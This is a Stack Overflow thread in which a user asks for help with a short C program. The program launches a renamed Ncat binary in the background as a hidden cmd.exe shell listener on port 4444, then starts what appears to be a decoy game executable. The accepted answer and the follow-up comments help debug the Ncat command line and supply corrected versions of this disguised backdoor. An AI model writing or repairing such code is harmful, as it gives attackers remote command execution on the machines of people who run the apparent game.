# Ncat: invalid -d delay (must be greater than 0 ) quitting

Tags: c

```
#include <stdio.h> 
#include <stdlib.h> 
int main() 
{ 
    system("start /B dir\\chest.exe -d -L -p 4444 -e cmd.exe"); 
    system("dir\\snowcraft.exe"); 
}
```

[This is my error any help please ?](https://i.stack.imgur.com/7ahKD.png)

Comment: Please, [do not post images of code](https://meta.stackoverflow.com/questions/285551/why-not-upload-images-of-code-on-so-when-asking-a-question). Instead copy the [relevent code](https://stackoverflow.com/help/mcve) directly in the question as text.

Comment: Welcome to Stack Overflow! Please take the [tour](https://stackoverflow.com/tour) and read [how to ask](https://stackoverflow.com/help/how-to-ask).

Comment: You haven't specified a `-d` value, instead just listed it.

Comment: #include <stdio.h>
#include <stdlib.h>

int main()
{
system("start /B dir\\chest.exe -d -L -p 4444 -e cmd.exe");
system("dir\\snowcraft.exe");
}

Comment: @WaleedYounis Please, instead of posting the code in the comment, edit your question to include the code. It is unreadable in the comments

Answer (score 0, accepted):

Its pretty clear, you have to set value bigger than 0 to `-d` argument.

Change

```
system("... -d -1 ...");
               ^
```

to

```
system("... -d 1 ...");
```

Comment: it is not -1 it is -L

Comment: #include <stdio.h>
#include <stdlib.h>

int main()
{
system("start /B dir\\chest.exe -d -L -p 4444 -e cmd.exe");
system("dir\\snowcraft.exe");
}

Comment: You have to set parameter for `-d` argument. So between `-d` and `-l` place number for delay, like `#include <stdio.h> #include <stdlib.h> int main() { system("start /B dir\\chest.exe -d 1 -L -p 4444 -e cmd.exe"); system("dir\\snowcraft.exe"); }`

Comment: there is this error in this link  any help !! 
https://www.gulf-up.com/a/1503925265251.png

Comment: I dont want to insult you but its really **CLEAR**. `#include <stdio.h> #include <stdlib.h> int main() { system("start /B dir\\chest.exe -d 1 -p 4444 -e cmd.exe"); system("dir\\snowcraft.exe"); }`

Comment: i do this but there is another error ( you must specify a host to connect to )

Comment: #include <stdio.h> #include <stdlib.h> int main() { system("start /B dir\\chest.exe -d 1 -p 4444 -e cmd.exe"); system("dir\\snowcraft.exe"); }

Comment: You have to know where do you want to connect to.

Comment: How can i do this ?

Comment: `#include <stdio.h> #include <stdlib.h> int main() { system("start /B dir\\chest.exe -d 1 -l WhereYouWantToConnectTo -p 4444 -e cmd.exe"); system("dir\\snowcraft.exe"); }`

Comment: How can i get the host name to connect correctly ?

Comment: I dont know where you want to connect. For example `#include <stdio.h> #include <stdlib.h> int main() { system("start /B dir\\chest.exe -d 1 -l 127.0.0.1 -p 4444 -e cmd.exe"); system("dir\\snowcraft.exe"); }`

Comment: Thank you very much i like your help for me <3

Comment: YW. Feel free to [accept](https://meta.stackexchange.com/questions/5234/how-does-accepting-an-answer-work) an answer if it helped you.